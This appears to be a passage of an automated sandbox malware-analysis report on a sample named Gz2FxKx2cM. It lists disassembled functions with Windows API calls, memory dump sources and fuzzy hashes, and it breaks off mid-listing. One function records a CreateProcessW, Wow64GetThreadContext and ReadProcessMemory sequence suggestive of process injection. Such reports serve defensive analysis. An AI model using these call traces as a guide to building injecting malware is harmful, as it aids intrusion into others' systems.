                                          Function 009698E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTempPathW.KERNEL32(00000104,?), ref: 009698F8
                                          • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0096990F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Temp$FileNamePath
                                          • String ID: aut
                                          • API String ID: 3285503233-3010740371
                                          • Opcode ID: ddd121a0fad3ad071cf605fa7238d903b9828362ac92149e077a4cad7d750422
                                          • Instruction ID: 513839aef86d0b84a2ff660d474e567ed98424f9e697e2f38608d1a3c79dc464
                                          • Opcode Fuzzy Hash: ddd121a0fad3ad071cf605fa7238d903b9828362ac92149e077a4cad7d750422
                                          • Instruction Fuzzy Hash: 4ED05E7954430DABDB50DBA0DC0EFDA773CE708704F0002B1BA64D11A1EAB095989B91
                                          Function 0097CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 753d6695bc1497d97b13a864913e59aeaa171e71c8cf4d7449d367cfc6564bdf
                                          • Instruction ID: b96ff6de2c897a190d2b5cf6b4f32d46eb960d0d76baa73b37ffdeb039c58ce2
                                          • Opcode Fuzzy Hash: 753d6695bc1497d97b13a864913e59aeaa171e71c8cf4d7449d367cfc6564bdf
                                          • Instruction Fuzzy Hash: 9AF106B16083019FCB14DF28C484A6ABBE5FF89314F54892EF8999B291D731E945CF82
                                          Function 0090F76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00920162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00920193
                                            • Part of subcall function 00920162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0092019B
                                            • Part of subcall function 00920162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 009201A6
                                            • Part of subcall function 00920162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 009201B1
                                            • Part of subcall function 00920162: MapVirtualKeyW.USER32(00000011,00000000), ref: 009201B9
                                            • Part of subcall function 00920162: MapVirtualKeyW.USER32(00000012,00000000), ref: 009201C1
                                            • Part of subcall function 009160F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0090F930), ref: 00916154
                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0090F9CD
                                          • OleInitialize.OLE32(00000000), ref: 0090FA4A
                                          • CloseHandle.KERNEL32(00000000), ref: 009445C8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                          • String ID:
                                          • API String ID: 1986988660-0
                                          • Opcode ID: e6723950a59408f43fa6d8010196095588e6ca99b937a545e6bed43b617c0213
                                          • Instruction ID: 7ebd4b6ad2a4bdfd094065b6ec2f54eb80224935c36bf4c288030564e1947a1d
                                          • Opcode Fuzzy Hash: e6723950a59408f43fa6d8010196095588e6ca99b937a545e6bed43b617c0213
                                          • Instruction Fuzzy Hash: F481BFB0D29B80CFC398DF29A850E197BE5FB98346792812AE019C73B1E77064C5EF11
                                          Function 0090434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00904370
                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00904415
                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00904432
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: IconNotifyShell_$_memset
                                          • String ID:
                                          • API String ID: 1505330794-0
                                          • Opcode ID: 74e093b634a696a18279f4fc7de19fc50a82bd420a3a513ee5d81ca158b8e7a7
                                          • Instruction ID: 67c2d2fd19ad38c70d6b90962a46644dc9e741ee691830747b163124fe0a3595
                                          • Opcode Fuzzy Hash: 74e093b634a696a18279f4fc7de19fc50a82bd420a3a513ee5d81ca158b8e7a7
                                          • Instruction Fuzzy Hash: 313193B19087018FD720DF34D884A9BBBF8FB58308F00092EF69A82291D771B984CB52
                                          Function 0092571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __FF_MSGBANNER.LIBCMT ref: 00925733
                                            • Part of subcall function 0092A16B: __NMSG_WRITE.LIBCMT ref: 0092A192
                                            • Part of subcall function 0092A16B: __NMSG_WRITE.LIBCMT ref: 0092A19C
                                          • __NMSG_WRITE.LIBCMT ref: 0092573A
                                            • Part of subcall function 0092A1C8: GetModuleFileNameW.KERNEL32(00000000,009C33BA,00000104,?,00000001,00000000), ref: 0092A25A
                                            • Part of subcall function 0092A1C8: ___crtMessageBoxW.LIBCMT ref: 0092A308
                                            • Part of subcall function 0092309F: ___crtCorExitProcess.LIBCMT ref: 009230A5
                                            • Part of subcall function 0092309F: ExitProcess.KERNEL32 ref: 009230AE
                                            • Part of subcall function 00928B28: __getptd_noexit.LIBCMT ref: 00928B28
                                          • RtlAllocateHeap.NTDLL(01010000,00000000,00000001,00000000,?,?,?,00920DD3,?), ref: 0092575F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                          • String ID:
                                          • API String ID: 1372826849-0
                                          • Opcode ID: 48134cd2b7ab51286b05b16c5bb8ab74bfefeb3ef81272bdff35fe460b47040e
                                          • Instruction ID: b735d81852579d7ad32aa9d6cb9a43b50212cc53e58fc2e80d8211b150b8e9e9
                                          • Opcode Fuzzy Hash: 48134cd2b7ab51286b05b16c5bb8ab74bfefeb3ef81272bdff35fe460b47040e
                                          • Instruction Fuzzy Hash: E901F172295B31EBEA102738FC82B2E738C8BC2761F524429F8099A18EDE748D005761
                                          Function 009698A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00969548,?,?,?,?,?,00000004), ref: 009698BB
                                          • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00969548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 009698D1
                                          • CloseHandle.KERNEL32(00000000,?,00969548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 009698D8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: File$CloseCreateHandleTime
                                          • String ID:
                                          • API String ID: 3397143404-0
                                          • Opcode ID: 156f920df4693da2e05f62b91939a197328dabd8b9e4989078d50629f7dd5545
                                          • Instruction ID: 036b7c341957320e6eb25dafb7e62f9f29cb662df6e2f538063b6e1a050183dd
                                          • Opcode Fuzzy Hash: 156f920df4693da2e05f62b91939a197328dabd8b9e4989078d50629f7dd5545
                                          • Instruction Fuzzy Hash: 7FE08632144214BBD7212B54EC0DFDA7B19EB06760F104120FB14A91E087B12521A798
                                          Function 00968D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 00968D1B
                                            • Part of subcall function 00922D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00929A24), ref: 00922D69
                                            • Part of subcall function 00922D55: GetLastError.KERNEL32(00000000,?,00929A24), ref: 00922D7B
                                          • _free.LIBCMT ref: 00968D2C
                                          • _free.LIBCMT ref: 00968D3E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                          • Instruction ID: d4f176f448ed4cbf6d854f2720bff08ec190d14df138c44d0657968eab26459d
                                          • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                          • Instruction Fuzzy Hash: A3E017B160162167CB24AAB8B950B9323EC4F9C352B140A1EB50DD71CACE64F8928178
                                          Function 0090A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CALL
                                          • API String ID: 0-4196123274
                                          • Opcode ID: 638c7db248c770ca7bb956ba2ed8d2a059798f277704fdf2e3eaa791a014279f
                                          • Instruction ID: 1b9d51bd86438a7c79283672a67ff64ec420332ad8c113c2e573f9948cdca336
                                          • Opcode Fuzzy Hash: 638c7db248c770ca7bb956ba2ed8d2a059798f277704fdf2e3eaa791a014279f
                                          • Instruction Fuzzy Hash: 57225870A08311DFDB24DF14C494B6ABBE5BF84304F15896DE99A8B3A2D735EC45CB82
                                          Function 00904C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID: EA06
                                          • API String ID: 4104443479-3962188686
                                          • Opcode ID: 780c5232eeb5786e005bf352076b5986405060425777894675a20a047021838f
                                          • Instruction ID: 4baea00b0c3c040122db948c004053a2484d7b26e82469de02df5a0f395f7e9d
                                          • Opcode Fuzzy Hash: 780c5232eeb5786e005bf352076b5986405060425777894675a20a047021838f
                                          • Instruction Fuzzy Hash: 7841ADF1A001686FDF219B54D8617BE7FAA9F95300F284474EF86DB2C2D634AD4487A1
                                          Function 00907A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0
                                          • Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                          • Instruction ID: 2af2ee72ffdd4efc6f02e1ce6b7b3111e9d7be8dfa22b0e2ae1560de39e477d3
                                          • Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                          • Instruction Fuzzy Hash: 633187B1B04606AFC714DFA8D8D1E69F3A9FF883207158629E519CB2D1EB34F950CB90
                                          Function 009047D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                          Download Yara Rule
                                          APIs
                                          • IsThemeActive.UXTHEME ref: 00904834
                                            • Part of subcall function 0092336C: __lock.LIBCMT ref: 00923372
                                            • Part of subcall function 0092336C: DecodePointer.KERNEL32(00000001,?,00904849,00957C74), ref: 0092337E
                                            • Part of subcall function 0092336C: EncodePointer.KERNEL32(?,?,00904849,00957C74), ref: 00923389
                                            • Part of subcall function 009048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00904915
                                            • Part of subcall function 009048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0090492A
                                            • Part of subcall function 00903B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00903B68
                                            • Part of subcall function 00903B3A: IsDebuggerPresent.KERNEL32 ref: 00903B7A
                                            • Part of subcall function 00903B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,009C52F8,009C52E0,?,?), ref: 00903BEB
                                            • Part of subcall function 00903B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00903C6F
                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00904874
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                          • String ID:
                                          • API String ID: 1438897964-0
                                          • Opcode ID: 639e5364a827115d17563aeffcb8a6c956bfc6f9caad52a4e2b8faba652c205a
                                          • Instruction ID: 9f50d4a4230f1d9fd1664a4ec346a43f5343551e13a45d479083c3586c8debda
                                          • Opcode Fuzzy Hash: 639e5364a827115d17563aeffcb8a6c956bfc6f9caad52a4e2b8faba652c205a
                                          • Instruction Fuzzy Hash: 56119DB19183019FC700EF29E805A0AFBE8EFD4750F11891EF450832B2DB709A49DB92
                                          Function 00920DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0092571C: __FF_MSGBANNER.LIBCMT ref: 00925733
                                            • Part of subcall function 0092571C: __NMSG_WRITE.LIBCMT ref: 0092573A
                                            • Part of subcall function 0092571C: RtlAllocateHeap.NTDLL(01010000,00000000,00000001,00000000,?,?,?,00920DD3,?), ref: 0092575F
                                          • std::exception::exception.LIBCMT ref: 00920DEC
                                          • __CxxThrowException@8.LIBCMT ref: 00920E01
                                            • Part of subcall function 0092859B: RaiseException.KERNEL32(?,?,?,009B9E78,00000000,?,?,?,?,00920E06,?,009B9E78,?,00000001), ref: 009285F0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                          • String ID:
                                          • API String ID: 3902256705-0
                                          • Opcode ID: 5b02d8ac4aab94b8606a4a9263fda6b3fd29fd441629022d01deea4ba9594014
                                          • Instruction ID: 82014a653d225089222d668e1945c814b98477375ff7d2d79f6beeda538597bf
                                          • Opcode Fuzzy Hash: 5b02d8ac4aab94b8606a4a9263fda6b3fd29fd441629022d01deea4ba9594014
                                          • Instruction Fuzzy Hash: 22F0A43550633976CB20BBA8FC05ADFB7AC9F81311F104865F908961D6DF719A80D2D1
                                          Function 009253A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00928B28: __getptd_noexit.LIBCMT ref: 00928B28
                                          • __lock_file.LIBCMT ref: 009253EB
                                            • Part of subcall function 00926C11: __lock.LIBCMT ref: 00926C34
                                          • __fclose_nolock.LIBCMT ref: 009253F6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                          • String ID:
                                          • API String ID: 2800547568-0
                                          • Opcode ID: 9c719e8f34fbac3fa89617ba15610b017e6d2a0008bfd6d5e4d932e1cde90b3b
                                          • Instruction ID: 50791cbc8a9c3dd07745fe68021297c77494b6992b6ec1899b5d4f7807e73ec5
                                          • Opcode Fuzzy Hash: 9c719e8f34fbac3fa89617ba15610b017e6d2a0008bfd6d5e4d932e1cde90b3b
                                          • Instruction Fuzzy Hash: 42F0B431802A24DADB10FF75B8027AE77E06F81374F229248E464AB1C9CFFC89419B52
                                          Function 012714CD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 01271C8B
                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01271D21
                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01271D43
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1460293219.0000000001270000.00000040.00000020.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1270000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                          • String ID:
                                          • API String ID: 2438371351-0
                                          • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                          • Instruction ID: c4593856acacf0072671b7566d9bcd6f5c36eb6f02d77b31c80f799b2f75326a
                                          • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                          • Instruction Fuzzy Hash: 8B12BD24A24658C6EB24DF64D8507DEB232EF68300F1090E9D10DEB7A5E77A4F91CF5A
                                          Function 00920C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                          • Instruction ID: 2852f147e85a5645314e8ba2413c46b4966ed7d3e6e9104c597b703e60676932
                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                          • Instruction Fuzzy Hash: 3831B7B0A001159FC718DF58E484969FBA6FB99300B6487A5E88ACB35AD731EDC1DBC0
                                          Function 0093FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ClearVariant
                                          • String ID:
                                          • API String ID: 1473721057-0
                                          • Opcode ID: d690eb0f9e1a2f097e06ca23a2e3992adf3ab2b18b572a444a4a3e4b9cced054
                                          • Instruction ID: 68a8ae3d89c41ab3e4082c892b2d9a933395af50f776106ab3f4214f1ceec5ed
                                          • Opcode Fuzzy Hash: d690eb0f9e1a2f097e06ca23a2e3992adf3ab2b18b572a444a4a3e4b9cced054
                                          • Instruction Fuzzy Hash: 0841FA745043519FDB24DF14C458B1ABBE1BF85314F0988ACE9998B7A2C735EC45CF92
                                          Function 00907B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
